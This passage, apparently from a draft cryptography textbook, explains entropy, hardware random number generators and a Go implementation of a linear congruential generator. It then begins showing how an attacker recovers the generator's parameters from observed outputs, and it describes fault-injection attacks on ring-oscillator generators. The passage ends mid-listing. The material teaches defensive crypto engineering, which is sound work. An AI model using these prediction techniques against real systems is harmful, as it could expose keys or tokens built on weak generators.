Khan K. Hacking Cryptography. Write, Break, and Fix Real-World... (MEAP v4) 2023
Cryptography has recently been thrust into the limelight thanks to cryptocurrencies, but it
has been around for far longer than that. It protects everything we do in the digital world and
is the last and most reliable line of defense for our data. Despite its significance and success,
cryptography is anything but infallible. While the theoretical foundations of this field of
knowledge are pretty sturdy, the practical applications seem almost doomed to eventually run
afoul of one implementation mistake or another.
You can gain a good understanding of how physical locks work by learning how to pick them. That's essentially what this book is about. While there are many books that explain how
cryptography is implemented (akin to how locks are made), this book builds an understanding
of cryptography by looking at how cryptographic locks are usually picked.
We hope that this book will expand the general understanding of and discourse surrounding cryptographic engineering. We look forward to hearing your thoughts on things that can be improved. The MEAP is somewhat unique in the publishing industry, and your feedback is exactly the proverbial gold it is trying to mine. It is an exciting prospect to be able to improve your book based on actual reader feedback while you're still writing it, and we heartily appreciate the opportunity to do so.
Please be sure to post any questions, comments, or suggestions you have about the book in
the liveBook discussion forum.
Thank you,
—Kamran Khan & Bill Cox
brief contents
1 Introduction
2 Random number generators
3 Implementing and exploiting RNGs
4 Stream ciphers
5 Block ciphers
6 Hash functions
7 Public key cryptography
8 Digital signatures
9 Common pitfalls for crypto implementations
1
Introduction
This chapter covers
What is cryptography and why is it important?
Where and how is cryptography used?
How is this book going to cover cryptography?
Getting cryptography right is paramount for ensuring digital security in the modern world.
The mathematical ideas and theory behind cryptography are quite hard to break, while the
implementations (transforming mathematical ideas to reality via engineering processes, e.g.,
programming code and designing hardware) have orders of magnitude more vulnerabil-
ities that are much easier to exploit. For these reasons, malicious actors regularly target
flaws in implementations in order to “break” crypto. We wanted to capture these attacks
with an organized approach so that engineers working in information security can use this
book to build an elementary intuition for how cryptographic engineering usually falls prey
to adversaries.
In the upcoming chapters, we will dive into the technical details of how cryptography is
implemented and exploited, but before that let’s first go through a high-level view of what
cryptography is.
1.1 What is cryptography?
Cryptography is primarily the art of securing data by transforming or encoding it in a way
that makes it incomprehensible for everyone except the intended recipients.
Imagine an impenetrable safe that can only be opened with a unique key. You leave the
key with a relative and then travel across the country taking the safe box with you.
Now, when you need to send something secretly to this relative you put the items in the
safe and ship them using regular mail. The post office can see who the box is addressed
to (because they need to deliver it) but they (or anyone else, e.g., mailbox thieves) cannot
open the box to see the contents. Only the relative who has the specific key can retrieve
the contents once they receive the box.
Cryptography can be thought of as the digital equivalent of the safe box in the preceding
example. One of its primary uses is to protect the secrecy of digital messages while they
are transported around the world (by various internet service providers) in the form of
internet packets.
Protecting messages against eavesdroppers has historically been the main area of focus
for practitioners of cryptography. In the last half-century, however, cryptographic tools have also come to be used to ensure the integrity and authenticity of data. Going back to the example of the
shipping boxes this would be akin to providing some incontrovertible proof that nobody
tampered with the box while it was en route.
Cryptography is the cornerstone of computer and network security in today’s world
and is by far the best tool for the job if you want to protect data against (both malicious
and accidental) exposure and/or corruption.
Data itself has grown exponentially in importance as governments, businesses and con-
sumers imbue it with meaning and significance; to the point where it is often referred to
as the “gold of the 21st century”. At its core, data is the main ingredient driving the digital revolution. Whether we are watching video streams, doing online banking, working from home via video calls, or playing video games, data drives our digital lives – and by extension, our physical ones as well.
The infrastructure that deals with these truly gargantuan amounts of data is almost
always shared. For example, when we open a bank account we do not get a banking kiosk
installed in our homes with a dedicated physical wire to the bank’s mainframes. We instead
use the internet to access the bank’s servers and our digital traffic shares the physical path
with many other businesses and customers along the way.
Sharing the infrastructure, however, implies that the data is exposed to parties other
than the ones it was intended for. Not only could others look at this data, but they can
also actively modify or corrupt it for nefarious gains. Cryptography guards data against
these scenarios; e.g., ensuring that our Internet service providers cannot see our emails
or someone who has access to our Wi-Fi (possibly in a public place) cannot modify our
transactions when we are making online payments.
Other areas such as military applications rely even more heavily on the secrecy and in-
tegrity of data. Breaking the encryption used by the Enigma machine proved to be a pivotal advantage for the Allies in World War II. It would not be an overstatement to say that
while secrecy and confidentiality of messages have always been important, providing these
properties at scale has become a crucial aspect of modern society. Those who could do it
well gained distinct competitive advantages, and those who lagged (whether nations or corporations) paid dearly with the loss of consumer confidence, revenue, and political influence, and even with strategic setbacks in full-scale wars.
Cryptography is used to accomplish the following goals:
Confidentiality: Protect data so that only the intended parties can see it. For example,
the data on your laptop’s hard drive should remain inaccessible to an attacker who
steals it.
Integrity: Protect data so that it is not modified or corrupted while it is being shared
between legitimate parties.
Authenticity: Ensure that an entity is who they claim to be. For example, if you are
communicating with an old schoolmate over a messaging app, you want to make sure that it is indeed them at the other end and not some malicious code or employee masquerading as your friend.
It is important to note that the data should remain protected even if an attacker knows
every detail about the encryption algorithm except for the secret key itself. This is known as “Kerckhoffs’s principle”. A system violates this principle when its security hinges upon
whether or not its implementation details (e.g., the algorithm, the source code, and design
documents) are known to adversaries. Unfortunately, this principle is overlooked far too
often in real-world engineering decisions; mostly as a result of time constraints (publicly
auditing implementations and leveraging trained eyeballs takes time and resources) and
sometimes as an artifact of human psychology (it’s no fun to have your work attacked, even if it’s important to do so).
Kerckhoffs’s principle
A cryptosystem should be secure even if an attacker knows everything about the sys-
tem except for the key.
1.2.2 Integrity
While confidentiality protects data against being seen, integrity protects data against being
modified or corrupted. Figure 1.2 shows the usage of a key to “sign” the data, essentially
generating a strong pairing between the data and the signature. The data can then be sent
to a trusted party – who also has the secret key – along with the signature without any
fear of it being modified along the way (e.g., by an Internet Service Provider). Since any
attacker attempting to corrupt the data would not have the secret key they would not be
able to generate a valid signature. Once the data reaches its intended destination the trusted
party can use its copy of the secret key to verify the signature. Therefore, while data is
transmitted in plain sight, it is guarded against modification by ensuring integrity.
Figure 1.2 Usage of “symmetric” signing for ensuring integrity
1.2.3 Authenticity
Authenticity is a special case of integrity. Integrity helps prove that a particular piece of data was not modified. Authenticity builds upon that assertion to conclude that such data was in control of a particular entity at some point. For example, imagine a website that does not want its users to provide a username and password each time they visit. To improve the user experience the website generates a “token” upon successful login (i.e., a piece
of data signifying that the user provided the correct username and password) and signs
it with a secret key. The signed token is then downloaded to the user’s machine and for
subsequent visits, it is automatically provided to the website, which uses its secret key to
verify the integrity of the token. If the token signature is valid, the website can assume that
it issued the token itself at some prior point and building on that assumption it can trust
the username specified in the token. In other words, the website has authenticated the user
by their possession of a cryptographic token.
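To make the mechanism concrete, here is a rough Go sketch of such a token scheme. This is not the book's code; it uses the standard crypto/hmac package, and the token format and names are invented for illustration.

package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// secretKey is a placeholder; a real service would generate and store this securely.
var secretKey = []byte("server-side-secret-key")

// issueToken signs a username with the server's secret key and returns
// "username.signature" as the token handed to the browser.
func issueToken(username string) string {
	mac := hmac.New(sha256.New, secretKey)
	mac.Write([]byte(username))
	return username + "." + hex.EncodeToString(mac.Sum(nil))
}

// verifyToken recomputes the signature and compares it in constant time.
// A valid signature tells the server it issued this token itself earlier.
func verifyToken(token string) bool {
	for i := len(token) - 1; i >= 0; i-- {
		if token[i] == '.' {
			username, sig := token[:i], token[i+1:]
			mac := hmac.New(sha256.New, secretKey)
			mac.Write([]byte(username))
			expected := hex.EncodeToString(mac.Sum(nil))
			return hmac.Equal([]byte(sig), []byte(expected))
		}
	}
	return false
}

func main() {
	token := issueToken("alice")
	fmt.Println("token:", token)
	fmt.Println("valid:", verifyToken(token))
	fmt.Println("tampered valid:", verifyToken("mallory."+token[len("alice."):]))
}

A forged or modified token fails the comparison in verifyToken, which is exactly the integrity-based authentication described above.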
We can find some very rough analogies for applications of confidentiality, integrity and
authenticity around us. If a super-unforgeable stamp is made that can be verified by a
recipient, it could be used to stamp an envelope’s seal. The envelope is providing con-
fidentiality against eavesdroppers. The stamp is providing integrity so that the recipient
can verify the stamp to trust the contents of the envelope. Let’s say that the envelope
contained a local newspaper from some remote town. You could then naturally conclude
that whoever possessed the stamp was in that particular town on a particular day. The last
conclusion admittedly requires a leap of faith (e.g., maybe the stamp was lost or stolen,
maybe the newspaper was mailed and then stamped in a different town) but you can still
base a reasonable assumption of authenticity on the integrity of the envelope. Simi-
larly, the formula for Coca-Cola is confidential. The caps on the bottles help us consumers
verify the integrity of the container and based on the results of our integrity check (and
the time/location of our purchase) we decide that the contents of the bottle are indeed
what they say on the label, i.e., they are authenticated by the Coca-Cola company and the
appropriate regulatory food authorities.
None of this will preempt the need for getting your code reviewed by as many experts
as possible. You cannot point to any cryptographic implementation and claim that it is
secure. The best you can do is to have as many people try to break it as possible and then
fix the bugs as fast as possible to build confidence in the codebase. Linus Torvalds (the
creator of the Linux operating system) once famously quipped, "given enough eyeballs, all
bugs are shallow”. For cryptographic code, that is both a curse and a blessing. When bugs are
found in cryptographic code they produce vulnerabilities. On the other hand, when you
have enough eyeballs you approach the tail-end of remaining bugs as they become harder
to find and the code in question becomes reasonably safe. This book aims to assist in the
training of those eyeballs.
1.5 Summary
Cryptography is the art of protecting the confidentiality and integrity of data. It con-
sists of mathematical theory and software (code) or hardware (dedicated chips) im-
plementations that leverage those mathematical ideas.
Cryptographic algorithms (i.e., the mathematical theory) are developed and adapted
after careful consideration and debate by top experts in the field.
Most cryptographic code is broken via attacks on its engineering implementation as
opposed to weaknesses in its mathematical theory.
Data is all around us and permeates shared infrastructure, where it is paramount to ensure its secrecy and safety.
When leveraging cryptography for security a good engineering approach is to use
well-established implementations.
Complex interactions between (even well-established) cryptographic components
can end up causing subtle weaknesses.
Readers of academic material on cryptography are well advised not to write their own cryptography because of the risk of subtle bugs that can compromise the security
of the whole system.
For cryptographic code that does have good reasons for being written from scratch, it
is valuable to crowdsource the review process and get the code reviewed by as many
experts as possible.
Random number generators
In this chapter, we lay the foundations for understanding what random numbers are and what some of the different kinds of random number generators are. We shall implement and exploit an insecure but quite widely used type of RNG known as the linear congruential generator (LCG). LCGs are not meant to be used for security-sensitive applications but will help us get into the habit of implementing and exploiting algorithms. (In the next chapter we shall implement and exploit a cryptographically secure RNG.)
My first encounter with randomness was when I used the RAND button on my father’s
scientific calculator. Whenever I would press it I would get a seemingly different number.
This confused me endlessly. As a kid, you have some intuition about the limits of the
world around you. For example, you know that while folks inside the TV represent real
people, you cannot physically go inside the box. I understood that human beings have
created machines that could do 2+2 for us and give us answers. But the machine was under
our control. How could human beings ask a machine to decide something apparently all
on its own? Did that mean that the machines were thinking for themselves? I was too
young to comprehend the differences between determinism and randomness, but as I grew up, learning about random number generators helped me wrap my head around how the calculator was working. 1
Let’s begin by taking a deeper look at what random means. Imagine a magician asking
you, “Think of a random number between 1 and 10”. Most of us understand at an intuitive
level what that means. The magician is asking us to think of a number that they supposedly
cannot guess or predict.
Essentially the magician is asking you to generate a random number. We could therefore
visualize random number generators as something that produces an arbitrary sequence of
random numbers.
Figure 2.1 RNGs generate random numbers that are hard to predict
You would think that we would be pretty good at such a rudimentary task but as it
turns out human beings are lousy RNGs. Ideally, if you ask an RNG to generate one thou-
sand numbers between 1 and 10 you would get roughly a hundred 1s, a hundred 2s, a hundred 3s and so on. In other words, the distribution of generated numbers would
be uniform. On the other hand, if you ask one thousand people to think of a number be-
tween 1 and 10 (or the same person a thousand times, although it is advised against for
reasons unrelated to random numbers or cryptography) you are likely to get many more
3s and 7s than 1s and 10s. This might seem inconsequential but the same problem plays
out at a larger scale where many people end up picking the same password under similar
constraints.
Instead of 100 million possible passwords, the number has now been reduced to 55800.
In fact, we would on average need to make only around 28 thousand guesses before finding the right password – a number much smaller than the roughly 50 million guesses we would need on average against the full space of 100 million possibilities! The passwords are still 8-
digits in length like before, e.g., November 24, 1988 would be represented as the eight-
digit number 11241988; but the range of possible passwords has been reduced drastically
making the job of an attacker way easier than before.
When a cryptographic key is picked, any bias in the RNG where it strays from uniform
distribution could make the job of guessing keys easier for the attackers. There are many
other uses for random numbers in the area of cryptography. For example, your passwords
are mixed with random numbers before some computations are performed on them to
make them secure. (We will discuss the exact nature of those computations in our chap-
ter on hashing.) In cryptographically-verifiable elections, votes are mixed with random
numbers to ensure that votes for the same candidate do not end up producing the same
encrypted data.
We, therefore, conclude that for cryptographic needs, an RNG such as the one shown
in figure 2.1 should produce output (the lone arrow in the picture) that is uniformly dis-
tributed across the entire range of possible outputs.
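A quick way to see what a roughly uniform distribution looks like is to tally the output of a software RNG. The sketch below uses Go's math/rand purely for illustration; it is not a cryptographic RNG.

package main

import (
	"fmt"
	"math/rand"
)

func main() {
	counts := make([]int, 11) // indices 1..10 are used
	for i := 0; i < 1000; i++ {
		n := rand.Intn(10) + 1 // uniform integer in [1, 10]
		counts[n]++
	}
	for n := 1; n <= 10; n++ {
		fmt.Printf("%2d: %d\n", n, counts[n])
	}
}

Each count should come out near 100; a human "RNG" asked the same question would show the 3s-and-7s skew described above.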
2.1.2 Entropy: Quantifying unpredictability
Another important characteristic of the RNGs is entropy, which can be defined as the mea-
sure of uncertainty (or disorder – in terms of its classical definition) in a system. In a fair
coin toss where both sides have an equal chance of landing face up, the entropy is 1 bit. If we denote heads by 1 and tails by 0, we are equally unsure about whether the value of that single bit will be heads or tails. The outcome of 10 successive fair coin tosses has an entropy of 10 bits.
If the coin had been tampered with in some way the entropy would be less than 1 bit.
In fact, the more biased it is, the lower the entropy. An extreme example would
be that if you have tails on both sides of the coin the entropy would be 0 bits. If the coin
has been tampered with so that heads has a 75% probability of coming up and tails only
25%, the entropy of such a coin toss would only be roughly 0.8 bits. Let’s see how.
The entropy of a probability distribution (e.g., distribution of numbers generated by an
RNG) can be calculated as shown in equation 2.2.
H(X) = − Σ_{x∈X} px · log2(px)                                    (2.2)
     = −p1 × log2(p1) − p2 × log2(p2) − ... − pn × log2(pn)
p1 is the probability of the first choice being picked, p2 is the probability of the second choice being picked, and so on. Each probability is multiplied by its binary log (log to the base 2), the products are summed, and the sum is negated. In terms of a coin toss, we only have p(heads) and p(tails). The sum of all probabilities for a given probability space is 1. In other words, while there's a 50% (0.5) chance of either side coming up each time you flip the coin, there is a 100% chance that the answer will be one of those two options. Each probability value is at most 1, which makes its logarithm zero or negative, so negating the sum produces a non-negative value for the entropy.
We can write a program to calculate the entropy of a biased coin toss. It will help us get
in the flow for upcoming code examples as well. In listing 2.1 we are going to:
Take two floating point numbers as input, respectively representing the probability
of heads or tails coming out on top.
When parsing the input, we want the sum of the two numbers to be equal to 1 (and
also not to exceed it). Because of the way floating point numbers work in Go, if we
simply compare (heads+tails) to 1 for equality, the check would fail for some inputs, e.g., 0.9 and 0.1 (even though their sum should mathematically be 1). For this reason, on line 34
we measure how close we are to approaching 1 instead of testing for equality.
Apply the formula in equation 2.2 to these values and output the result.
These steps are shown in the flowchart in figure 2.2.
Figure 2.2 Flow chart for calculating the entropy of a biased coin toss
Listing 2.1 ch02/biased_coin_toss/main.go
 1 package main
 2
 3 import (
 4     "fmt"
 5     "math"
 6     "os"
 7     "strconv"
 8 )
 9
10 func main() {
11     var line string
12
13     fmt.Printf("Enter probability of heads (between 0.0 and 1.0): ")
14     fmt.Scanln(&line)
15     heads, err := strconv.ParseFloat(line, 32)
16     if err != nil || heads < 0 || heads > 1 {
17         fmt.Println("Invalid probability value for heads")
18         os.Exit(1)
19     }
20
21     fmt.Printf("Enter probability of tails (between 0.0 and 1.0): ")
22     fmt.Scanln(&line)
23     tails, err := strconv.ParseFloat(line, 32)
24     if err != nil || tails < 0 || tails > 1 {
25         fmt.Println("Invalid probability value for tails")
26         os.Exit(1)
27     }
28
29     if heads+tails > 1 {
30         fmt.Println("Sum of P(heads) and P(tails) must not exceed 1")
31         os.Exit(1)
32     }
33
34     if 1-(heads+tails) > 0.01 { // measures the delta of (heads+tails) from 1
35         fmt.Println("Sum of P(heads) and P(tails) must be 1")
36         os.Exit(1)
37     }
38
39     entropy := -(heads * math.Log2(heads)) - (tails * math.Log2(tails))
40     fmt.Printf("P(heads)=%.2f, P(tails)=%.2f, Entropy: %.2f bits\n", heads, tails, entropy)
41 }
Let’s run this program for a few inputs as shown in listing 2.2.
As you can see, even though we are still getting one bit of output (i.e., whether the result
was heads or tails) when we do toss the coin, the entropy of output decreases as the coin
toss becomes more biased. Another way to understand this is to look at it from the other
side, i.e., if a coin toss has an entropy of 1 bit, guessing its output becomes as hard as it can
be for a coin toss. If it has an entropy of 0.47 bits we know one outcome is likelier than
the other so guessing it becomes relatively easier.
Figure 2.3 shows how entropy (the solid curved line) changes as the coin toss becomes
more biased. The dotted lines represent the probabilities of heads or tails coming up.
Please note that their sum always remains exactly equal to 1 because they represent the
entire probability space, i.e., there is no third outcome. Entropy is maximum (the peak in
the middle) when both heads and tails have a 50% probability of occurring. That is when
it is the hardest to predict which way the coin is likelier to land.
So how is entropy related to RNGs? If the output of an RNG is uniformly distributed,
the job of guessing the output is as hard as it could be. We have maximum possible uncer-
tainty about the output and entropy is the measure of uncertainty.
TRNGs sample the physical world to generate values that are practically unpredictable. (There could be a philosophical argument that we are living in a deterministic universe and nothing is truly “unpredictable”, but it is not relevant for cryptographic discussions. We only need the values to be un-guessable by contemporary adversaries on earth.) This is shown in figure 2.4. These phenomena range from nuclear decay to noise in electrical circuits, such as the diode effects discussed next.
Figure 2.5 Diodes help ensure the flow of current in a single direction.
When voltage is applied to the diode such that the current can flow in its natural direction, the diode is said to be “forward-biased”. When the voltage is reversed the diode (ideally)
stops conducting and is said to be “reverse-biased”.
The fact that the current does not usually flow when a diode is reverse-biased is exactly
what makes them useful. There are however a few unintended properties associated with
certain types of diodes. These are called “parasitic” effects as they are, generally-speaking,
undesirable. Sometimes, though, even the parasitic effects can be useful, as is the case with random-number generation and the avalanche and Zener effects, two distinct physical phenomena that generate noise in the electrical circuit. This noise can then be sampled by amplifying it and running it through an analog-to-digital converter (ADC).
Zener diodes make poor TRNGs despite their heavy usage for that purpose. There are
a few reasons why:
Zener diodes are carefully designed to reduce avalanche noise and therefore make terrible sources of electronic noise. Note that a very common use case for Zener diodes is
power supply regulation where noise is highly undesirable.
The parasitic Zener effect of a reverse-biased diode is not typically parameterized by
the manufacturer. The manufacturers prioritize quality control for the "proper" oper-
ation of Zener diodes as opposed to side effects when biased in the reverse direction.
The noise varies dramatically from device to device. Even worse, variations from manufacturer to manufacturer can easily exceed 10X in noise level, with several volts’ difference in breakdown voltage.
The noise from these Zener effects is fairly temperature sensitive and can change
over time as the circuit ages.
There is no physical model we can correlate well to Zener noise for assessing the
health of a TRNG.
Typical ring oscillators have 5 or more inverters, but the number is always odd. Usually,
this oscillation is subject to thermal drift. That is, their operation (e.g., how long it takes
for the output level to fully change when input is inverted) varies in response to ambient
temperature. The underlying phenomenon providing unpredictability is the phase noise
in the electrical signal.
The ring oscillator TRNG designs have a few shortcomings and are responsible for
quite a few failures in cryptography. Here’s why:
As we saw in the guidelines at the beginning of the section, a physical model based
on the underlying phenomena that lets us calculate entropy is important for an RNG.
There is no physical model we can use to predict the operation of ring oscillator-based
RNGs (which is further complicated by the presence of thermal and other kinds of
unpredictable drifts in oscillators).
Fabrication processes generally improve over time, reducing even thermal drift, and circuits that were well designed can end up generating highly predictable output with newer and improved manufacturing processes. This is similar to Zener diodes, where the RNG relies on a parasitic effect that is not a priority for the manufacturing process (and is in many cases undesirable to begin with).
Ring oscillators have poor physical defenses. Anyone with a sine wave generator
can introduce sine-shaped noise (close to the ring oscillator frequency) on the power
source of the chip and the oscillator will lock onto that frequency, making the output
of the TRNG trivial for the attacker to guess. This is an example of “fault-injection”
attacks where the attacker tries to influence the output of a TRNG.
If you do decide to use ring oscillator-based TRNGs here are some best practices to
follow:
Add a simple binary counter to the output of the TRNG, so you know how many
times the ring oscillator toggled from a 0 to a 1. If, e.g., in the last minute (or some
other window) the number of ones drastically outweighs the number of zeros, the
discrepancy could indicate faulty operation.
Make the design public and expose raw access to the TRNG’s full counter output bits
so its health can be assessed.
If you use a fixed delay to sample the TRNG (the simplest solution used virtually everywhere), then have an external health checker estimate the unpredictability per sample from the TRNG (by calculating the entropy using equation 2.2); a rough sketch of such a check appears below.
Remember that ring oscillator TRNGs are subject to simple noise injection attacks.
If that’s okay for your threat model then you’re good. On the other hand, if you need
some physical protection, consider potting 3 over your IC, or putting some other
physical barrier to keep the attacker at least a few millimeters away, and preferably a
few inches.
If you have access to a secure flash on-chip, which cannot easily be read by an at-
tacker, consider seeding your CSPRNG from both the TRNG and a seed stored in
flash, and then update the seed in flash from the CSPRNG. This way, if your TRNG
degrades due to process drift, temperature, etc, you can integrate the TRNG output
over multiple boot cycles, and hopefully reach a computationally un-guessable state.
While the last recommendation applies in general to other TRNGs as well, ring oscillator-based TRNGs should pay special attention to it owing to their poor defenses against fault-
injection attacks.
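Here is a rough Go sketch of such a health check. It is not a production monitor: the hypothetical readRawBits function merely stands in for however your hardware exposes raw samples, and this check only detects bias, not correlations between bits.

package main

import (
	"fmt"
	"math"
)

// bitEntropy estimates the per-sample entropy (equation 2.2) from a window of
// raw TRNG bits, using the observed fraction of ones as an estimate of P(1).
func bitEntropy(bits []byte) float64 {
	ones := 0
	for _, b := range bits {
		if b != 0 {
			ones++
		}
	}
	p1 := float64(ones) / float64(len(bits))
	p0 := 1 - p1
	h := 0.0
	if p1 > 0 {
		h -= p1 * math.Log2(p1)
	}
	if p0 > 0 {
		h -= p0 * math.Log2(p0)
	}
	return h
}

func main() {
	// readRawBits is hypothetical: replace it with however your design
	// exposes the ring oscillator's raw sampled bits.
	window := readRawBits(4096)
	h := bitEntropy(window)
	fmt.Printf("estimated entropy: %.3f bits/sample\n", h)
	if h < 0.9 { // the threshold is an arbitrary example; tune it for your hardware
		fmt.Println("WARNING: TRNG output looks biased, possible fault or attack")
	}
}

// readRawBits is a stand-in so the sketch compiles; it is NOT a real driver.
// It returns all zeros, which will (correctly) trigger the warning above.
func readRawBits(n int) []byte {
	return make([]byte, n)
}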
TRNGS BASED ON MODULAR ENTROPY MULTIPLICATION
The MEM architecture for RNGs takes thermal noise generated by a resistor and dou-
bles it repeatedly. This causes the voltage to grow exponentially. After it crosses a threshold
(which is the halfway point of the voltage range), instead of doubling the voltage itself it doubles the excess over the halfway point and adds the result to the original voltage. Since
the operations are performed in a modular fashion (meaning the result never overflows,
much like a clock where adding four hours to 9 results in 1 instead of overflowing to 13)
the excess-doubling step ends up having a net subtractive outcome (i.e., going from the
larger number of 9 to the smaller number of 1 in the example presented above).
3 Potting (electronics). https://en.wikipedia.org/wiki/Potting_(electronics)
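As a toy numerical model of the modular doubling just described (an idealized simulation only, with math/rand standing in for the physical thermal noise; it is not a circuit design):

package main

import (
	"fmt"
	"math/rand"
)

// The "voltage" v lives in [0, 1). Each step doubles it modulo the range (the
// excess over the halfway point wraps around), a tiny amount of noise is
// injected, and the output bit records which half of the range v landed in.
// The repeated doubling keeps amplifying the injected noise, so the bits
// quickly become unpredictable even though the rule itself is deterministic.
func main() {
	v := 0.3                    // arbitrary starting voltage
	const noiseAmplitude = 1e-6 // stand-in for thermal noise from the resistor
	for i := 0; i < 32; i++ {
		bit := 0
		if v >= 0.5 {
			bit = 1
		}
		v = 2 * v // double the voltage
		if v >= 1 {
			v -= 1 // modular wrap-around, like 9 + 4 hours = 1 o'clock
		}
		v += (rand.Float64() - 0.5) * noiseAmplitude // inject a little noise
		if v < 0 {
			v += 1
		} else if v >= 1 {
			v -= 1
		}
		fmt.Print(bit)
	}
	fmt.Println()
}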
Based on these two simple rules the voltage keeps fluctuating quite unpredictably but
stays within its range. The MEM method has many distinct advantages for a TRNG:
It is resistant to electromagnetic noise injection or capacitive/inductive coupling at-
tacks.
It provides a physical model that can be used to continuously assess the health of the
RNG.
The components involved are very cheap and few in number and the design is unen-
cumbered by patents.
Several free schematics are available (e.g., Bill Cox’s infnoise 4 design or Peter’s re-
design known as REDOUBLER 5 ).
It is also very fast, with infnoise being able to run in excess of 100 Mbit/second. It
is important to understand though that speed itself should not be a critical factor for
TRNGs as their output should be used only to seed cryptographically secure pseudo-
random number generators that we will soon discuss in this chapter. In general 512
random bits from a TRNG should be enough to seed CSPRNGs as long as the lat-
ter upholds its own security guarantees (in chapter 3 we will dive deeper into how
CSPRNGs are compromised).
Randomness extractors
Randomness extractors clean noise generated from weakly random entropy sources
to produce high-quality random output.
6 Thompson, P. (2018). John Von Neumann, the Last Great Polymath. Sothebys. https://www.sothebys.
com/en/articles/john-von-neumann-the-last-great-polymath
Figure 2.7 TRNGs are used to seed PRNGs
1 #include <iostream>
2 #include <random>
3
4 int main() {
5 std::minstd_rand lcg_rand;
6
7 lcg_rand.seed(42);
8
9 for (int i = 0; i < 10; ++i) {
10 std::cout << lcg_rand() << ", ";
11 }
12 std::cout << lcg_rand() << std::endl;
13 }
We are using the minstd_rand generator that comes with the C++ standard library.
If you compile and run this file with the GNU C++ compiler, you will get a sequence of
numbers looking like this:
$ g++ main.cpp
$ ./a.out
2027382, 1226992407, 551494037, 961371815, 1404753842, 2076553157,
1350734175, 1538354858, 90320905, 488601845, 1634248641
Next, we are going to implement this generator in Go ourselves using equation 2.3. The
LCG used by the C++ counterpart uses constant values given in equation 2.4.
m = 2^31 − 1
a = 48271                                                          (2.4)
c = 0
By plugging these constants in the LCG equation, and seeding with the same input (42),
we should get the same sequence of numbers back. Let’s write a program to do so.
Starting with the next example we will be splitting a single code file among multiple
listings in the book to make it easier to follow along. The full code for these examples can
be found in the book repository at https://github.com/krkhan/crypto-impl-
exploit. The book listings will only be focusing on specific portions that are important
or new to the discussion taking place. Please note that listing 2.4 starts at line 3.
The fields multiplier, increment and modulus have been covered above as parts of
equation 2.3. Similarly, currentValue corresponds to Xn . The next value Xn+1 is there-
fore generated via the following function, which returns the old value and moves the RNG
one step forward. We continue listing the ch02/lcg/main.go file in listing 2.5, starting
from line 21 now.
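The book splits the implementation across listings 2.4 and 2.5; a compact sketch consistent with equation 2.3 could look like the following. The struct and constructor names here are assumptions, and Next advances the state before returning the new value so that it reproduces the C++ sequence above; the book's listing may order those steps differently.

package lcg

// LCG is a sketch of a linear congruential generator driven by equation 2.3,
// X_{n+1} = (a*X_n + c) mod m. The field names match the ones described in
// the text; everything else is a stand-in.
type LCG struct {
	multiplier   int64 // a
	increment    int64 // c
	modulus      int64 // m
	currentValue int64 // X_n
}

// NewLCG seeds the generator with X_0.
func NewLCG(a, c, m, seed int64) *LCG {
	return &LCG{multiplier: a, increment: c, modulus: m, currentValue: seed}
}

// Next advances the state and returns the freshly generated value.
func (l *LCG) Next() int64 {
	l.currentValue = (l.multiplier*l.currentValue + l.increment) % l.modulus
	return l.currentValue
}

Constructing the generator with NewLCG(48271, 0, (1<<31)-1, 42) and calling Next() repeatedly should reproduce the minstd_rand output shown earlier.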
To test this LCG we will initialize it with the constants used in the C++ minstd_rand
generator – including the seed value of 42 (the same one we used in listing 2.3). Please
note that listing 2.6 refers to a different file name from the accompanying code repo.
Our LCG produced the same output as the C++ one. The output sequence looks random
but as we’ll see in the next section, even if an attacker knows nothing about the internal
parameters of this LCG they can easily predict future outputs just by observing it in action
for a while. For the time being, we can see that a PRNG:
Has an algorithm that it uses to keep generating values.
Starts with a seed as input for the first run of that algorithm.
Has an internal state which keeps mutating according to the algorithm. In our LCG
example, the state was Xn , stored in lcg.currentValue.
This is shown in figure 2.8.
At some point, every PRNG starts repeating values. The number of steps it takes for a
PRNG to start repeating values is known as its period. For the LCG we implemented, the period is 2^31 − 1, meaning it will start repeating its output after generating 2147483647
values.
Figure 2.8 PRNGs have a state and are initialized with a seed. The PRNG algorithm keeps mutating the
state.
We can start with a simple scenario by assuming that we (as attackers) have the multiplier a and the modulus m but not the increment c. We can simply observe two values X0 and X1 and find out the increment by rearranging the LCG equation as shown in equation 2.6.
X1 = (aX0 + c) mod m
(2.6)
c = (X1 − aX0 ) mod m
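In code, the recovery in equation 2.6 is essentially a one-liner. The function below is a sketch written in the same fragment style as the surrounding listings; the name is made up.

// recoverIncrement implements equation 2.6: given the multiplier a, the
// modulus m, and two consecutive outputs, it recovers the increment c.
func recoverIncrement(x0, x1, a, m int64) int64 {
	c := (x1 - a*x0) % m
	if c < 0 { // Go's % can yield a negative remainder; normalize into [0, m)
		c += m
	}
	return c
}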
Let’s say we know the modulus but neither the increment nor the multiplier. Can we
recover the multiplier? This time we observe three values X0 , X1 and X2 . We can find out
the multiplier using these values as shown in equation 2.7.
X1 = (aX0 + c) mod m
X2 = (aX1 + c) mod m
X2 − X1 = (aX1 − aX0) mod m                                        (2.7)
X2 − X1 = (a(X1 − X0)) mod m
a = ((X2 − X1) × (X1 − X0)^(−1)) mod m
There is a problem though: we need to find the inverse of a value, (X1 − X0). Finding the multiplicative inverse of something is easy for rational numbers. For example, the multiplicative inverse of 5 is 1/5; for 7/3 it is 3/7; and so on. For modular arithmetic, it's a little tricky. We are all familiar with the modular arithmetic of 12-hour clocks, where 10 plus 3 hours is 1 (modulo 12). What is the multiplicative inverse of, let's say, 7 mod 12? We need to find some n to multiply 7 with that would result in 1. There is no 1/7 to pick among the integers modulo 12.
As it turns out, the multiplicative inverse of 7 modulo 12 is 7 itself! 7 times 7 is equal to 49, which is only 1 more than a multiple of 12. As you can see, the multiplicative inverse is not straightforward in modular arithmetic. Finding the modular multiplicative inverse has
many interesting solutions, but we are going to use the one provided by the Go standard
library itself. Unfortunately, the code for doing so will seem a little clunky right now, as
shown in listing 2.8. In the next chapter, we shall explore the “big numbers” library from
Go in further detail.
 3 import (
 4     "github.com/krkhan/crypto-impl-exploit/ch02/lcg/go/impl_lcg"
 5     "math/big"
 6 )
 7
 8 func findModInverse(a, m int64) int64 {
 9     return new(big.Int).ModInverse(big.NewInt(a), big.NewInt(m)).Int64()
10 }
Now that we have a function to calculate the modular multiplicative inverse, we can
implement equation 2.7 in listing 2.9.
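As a sketch of that recovery (the book's listing 2.9 may be organized differently), the function below reuses findModInverse from listing 2.8; its name is made up.

// recoverMultiplier implements equation 2.7: a = (X2 - X1) * (X1 - X0)^-1 mod m.
// It assumes the modulus m is already known.
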